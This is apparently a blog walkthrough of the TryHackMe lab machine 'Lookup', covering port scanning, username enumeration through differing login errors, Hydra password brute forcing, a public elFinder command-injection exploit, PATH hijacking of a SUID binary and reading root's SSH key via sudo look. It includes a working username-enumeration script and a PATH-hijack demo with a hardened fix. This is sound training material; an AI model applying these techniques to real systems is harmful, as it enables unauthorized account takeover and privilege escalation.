From Basic Enumeration to Root | TryHackMe Lookup

Motasem Hamdan
3 min read · Jan 8, 2025


In this post we walk through the TryHackMe boot-to-root machine Lookup. The path follows the usual shape: Nmap scanning and service enumeration turn up a login form whose error messages differ for unknown and known usernames, so a short Python script enumerates valid accounts and Hydra then brute-forces the password. The authenticated user lands in a file manager hosted on a subdomain, and the running version of that application is vulnerable to a PHP command injection; the public exploit (also packaged as a Metasploit module) gives an initial foothold as www-data. From there we move laterally to a second user by abusing a SUID binary that resolves a helper command through the attacker-controlled PATH, and finally apply a GTFOBins technique to a sudo-permitted binary to reach root.

1. Initial Scanning

  • The presenter starts with an Nmap scan to identify open ports and services on the target machine. The scan reveals two open ports:
  • Port 22: SSH
  • Port 80: HTTP
  • Aggressive scan options (e.g. Nmap's -A, which enables version detection, default scripts, OS detection and traceroute) are acceptable here because the target is a lab machine; against production systems the same scan is noisy and likely to trigger firewall or IDS alerts.

2. Web Application Enumeration

  • Accessing the web service on port 80 reveals a login form. The site's domain is added to /etc/hosts so the host can be resolved by name.
  • Attempts are made to log in with default credentials (admin:admin), but they fail.
  • Using Burp Suite, the presenter intercepts the login request and compares server responses: the error message returned for a non-existent username differs from the one returned for a valid username with a wrong password. That difference is a username-enumeration oracle.

3. Brute Force Attack

  • A Python script iterates over a username wordlist, submits each candidate to the form, and uses the differing server responses to separate valid accounts from invalid ones.
  • The script identifies two valid usernames: admin and Jose.
  • Hydra is then pointed at the login form for the user Jose and recovers the password password123.
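The enumeration step above, as an added example (this is not the walkthrough's own script). It assumes the form returns one error text for an unknown username and a different one for a known username with a wrong password; the two strings MSG_BAD_USER and MSG_BAD_PASS, the form field names username and password, and the candidate list are placeholders that must be replaced with what Burp shows for the real target. The transport is injectable so the demo runs offline against a constructed stand-in for the server.

```python
"""Username enumeration through a login form's error-message oracle.

Added example; not the walkthrough's script. The error fragments and field
names below are assumptions: read the real ones from Burp before relying on them.
"""
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List

Poster = Callable[[str, str], str]  # (username, password) -> response body

# Assumed error fragments; replace with the target's actual messages.
MSG_BAD_USER = "Wrong username or password."
MSG_BAD_PASS = "Wrong password."


def classify(body: str) -> str:
    """Map a response body to 'valid' (user exists), 'invalid' or 'unknown'."""
    # The two fragments do not overlap here; if the real messages do, test the
    # more specific one first or compare the whole error string.
    if MSG_BAD_PASS in body:
        return "valid"
    if MSG_BAD_USER in body:
        return "invalid"
    # Lockout page, WAF block, 5xx, etc.: never silently count these as invalid.
    return "unknown"


def enumerate_users(post: Poster, candidates: Iterable[str],
                    probe_password: str = "not-the-password") -> Dict[str, List[str]]:
    """Send one probe per candidate and bucket the names by oracle result."""
    buckets: Dict[str, List[str]] = {"valid": [], "invalid": [], "unknown": []}
    for name in candidates:
        buckets[classify(post(name, probe_password))].append(name)
    return buckets


def http_poster(url: str) -> Poster:
    """Real transport: form-encoded POST with the standard library (not used in the offline demo)."""
    def post(username: str, password: str) -> str:
        data = urllib.parse.urlencode({"username": username, "password": password}).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return post


def fake_login(valid_users: Iterable[str]) -> Poster:
    """Constructed stand-in for the target so the example runs offline."""
    known = set(valid_users)

    def post(username: str, password: str) -> str:
        msg = MSG_BAD_PASS if username in known else MSG_BAD_USER
        return f"<div class='error'>{msg} Please try again.</div>"
    return post


if __name__ == "__main__":
    # Constructed account list and wordlist; swap fake_login for http_poster(url) on a real engagement.
    target = fake_login(["admin", "Jose"])
    found = enumerate_users(target, ["root", "admin", "Jose", "guest", "test"])
    print("valid usernames:", found["valid"])  # → ['admin', 'Jose']
```

The "unknown" bucket matters in practice: rate limiting or a lockout page changes the response for every later probe, and treating those as "invalid" silently poisons the results.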

4. Exploitation of the Web Application

  • After logging in as Jose, the interface is a web-based file manager listing various files.
  • Among them is a file named credentials that contains a username (think) but no password.
  • The file manager identifies itself as elFinder, and the running version is affected by a known PHP command injection vulnerability.
  • SearchSploit returns an exploit matching that version; running it (the same vulnerability is also available as a Metasploit module) yields a reverse shell on the machine.

5. Privilege Escalation

  • The initial shell runs as www-data. The goal is to escalate to think and then to root.
  • Enumerating the filesystem reveals a SUID binary named pwm. Because of the SUID bit it runs with its owner's privileges; it shells out to the id command by bare name to determine which user invoked it, then reads that user's passwords file from their home directory.
  • Since the binary resolves id through the caller's PATH instead of an absolute path, the presenter writes a fake id script that prints think's uid line, prepends its directory to PATH, and runs pwm. pwm now believes think invoked it and prints the passwords file from think's home directory.
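The PATH-hijack mechanics above, as an added example (it is not the room's pwm binary). Two functions model the behaviour described: current_user_vulnerable() runs id through whatever PATH the caller supplies, exactly the mistake pwm makes, and current_user_fixed() pins PATH to trusted directories and calls id by absolute path. The fake id prints a constructed uid line for the assumed target user think. It needs a POSIX system with /bin/sh and a real id(1) in /usr/bin or /bin.

```python
"""PATH hijacking of a privileged program that shells out to `id` by bare name.

Added example; not the room's pwm binary. TARGET_USER and FAKE_ID_LINE are
constructed. Requires /bin/sh and a genuine id(1) in /usr/bin or /bin.
"""
import os
import re
import shutil
import stat
import subprocess
import tempfile
from typing import Dict, Tuple

TRUSTED_PATH = "/usr/bin:/bin"
TARGET_USER = "think"  # assumed victim account
# Constructed output for the fake id; only the uid=NNN(name) part is parsed.
FAKE_ID_LINE = f"uid=1000({TARGET_USER}) gid=1000({TARGET_USER}) groups=1000({TARGET_USER})"
UID_RE = re.compile(r"uid=\d+\(([^)]+)\)")


def parse_user(id_output: str) -> str:
    """Extract the login name from id(1) output: 'uid=33(www-data) ...' -> 'www-data'."""
    m = UID_RE.search(id_output)
    if not m:
        raise ValueError(f"unexpected id output: {id_output!r}")
    return m.group(1)


def current_user_vulnerable(env: Dict[str, str]) -> str:
    """Resolves `id` via the caller-controlled PATH. A SUID program doing this can be
    made to 'see' any user by placing a fake id first in PATH."""
    out = subprocess.run(["id"], env=env, capture_output=True, text=True, check=True).stdout
    return parse_user(out)


def current_user_fixed(env: Dict[str, str]) -> str:
    """Hardened: discard the caller's PATH, resolve id from trusted directories only,
    and invoke it by absolute path."""
    safe_env = dict(env)
    safe_env["PATH"] = TRUSTED_PATH
    id_path = shutil.which("id", path=TRUSTED_PATH)
    if id_path is None:
        raise FileNotFoundError("id(1) not found in trusted PATH")
    out = subprocess.run([id_path], env=safe_env, capture_output=True, text=True, check=True).stdout
    return parse_user(out)


def real_user() -> str:
    """The account actually running this script, resolved the hardened way."""
    return current_user_fixed(dict(os.environ))


def plant_fake_id(directory: str) -> str:
    """Write the attacker's `id` into directory and mark it executable."""
    path = os.path.join(directory, "id")
    with open(path, "w") as f:
        f.write(f"#!/bin/sh\necho '{FAKE_ID_LINE}'\n")
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def demo() -> Tuple[str, str]:
    """Return (who the vulnerable lookup thinks we are, who the fixed lookup says we are)."""
    with tempfile.TemporaryDirectory() as tmp:
        plant_fake_id(tmp)
        # Equivalent of the shell's: export PATH=/tmp/evil:$PATH
        env = dict(os.environ)
        env["PATH"] = tmp + os.pathsep + env.get("PATH", TRUSTED_PATH)
        return current_user_vulnerable(env), current_user_fixed(env)


if __name__ == "__main__":
    hijacked, genuine = demo()
    print(f"vulnerable lookup: {hijacked}   hardened lookup: {genuine}")
```

The same defence applies to compiled SUID programs calling system("id") or popen("id"): either hard-code the absolute path or reset PATH before the call, and prefer getuid()/getpwuid() over parsing a child process at all.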

6. Further Enumeration and Root Escalation

  • The dumped password list is used as a Hydra wordlist against SSH, which recovers think's password.
  • Logged in as think, sudo -l shows the user may run the look binary as root.
  • look prints the lines of a file that begin with a given prefix; with an empty prefix every line matches, so sudo look can read any file, including the root user's private SSH key (the GTFOBins technique mentioned in the introduction).
  • With that key the presenter logs in over SSH as root and collects both the user and root flags.

Key Techniques Demonstrated

  • Reconnaissance: Nmap for port and service discovery, Burp Suite for inspecting the login flow.
  • Brute forcing: a custom username-enumeration script plus Hydra for web-form and SSH passwords.
  • Exploitation: matching a known application version to a public exploit with SearchSploit.
  • Privilege escalation: PATH hijacking of a SUID binary, then abuse of a sudo-permitted file-reading binary (look) to obtain root's SSH key.

TryHackMe Lookup | Room Answers

Room answers can be found here.

Video Walkthrough



Written by Motasem Hamdan

Motasem Hamdan is a content creator and swimmer who creates cyber security training videos and articles. https://www.youtube.com/@MotasemHamdan
